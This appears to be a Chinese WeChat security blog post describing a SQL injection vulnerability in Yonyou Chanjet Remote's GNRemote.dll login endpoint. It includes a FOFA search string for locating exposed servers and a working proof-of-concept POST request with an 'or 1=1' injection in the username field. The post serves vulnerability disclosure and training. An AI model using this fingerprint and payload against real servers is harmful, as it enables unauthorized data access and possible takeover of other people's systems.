安全攻防渗透
微信号 co01fire
功能介绍 信息安全领域原创公号,专注信安领域人才培养和知识分享,致力于帮助叁年以下信安从业者的学习和成长。
__发表于
收录于合集
#用友 17 个
#网络安全 41 个
#漏洞分析 23 个
点击上方“安全攻防渗透”关注我~
Tips :用友Web应用漏洞_4 **- 漏洞描述 -**用友 畅捷通远程通 GNRemote.dll SQL注入漏洞,攻击者通过SQL注入从而获取服务器上的敏感信息,甚至可以通过注入恶意代码来控制设备。
- 影响范围 -
用友 畅捷通远程通
** - FOFA -**
body="远程通CHANJET_Remote" - 漏洞复现 -
POC
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
**抓包请求
**
****end
这就是【知识分享】 文章系列 第【7】篇:《用友 畅捷通远程通 GNRemote.dll
SQL注入漏洞》,如果你觉得本篇写得不错,或者这个系列值得关注,可以表达你的意见!
** -延伸阅读** ** -**
知识分享1:[CVE-2018-18778]ACME Mini_httpd 任意文件读取漏洞(Web服务器漏洞)
** ** ** -聆听你的声音** ** -******
** ** 如果你有独到的想法和建议,欢迎私信与我一同分享!****
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看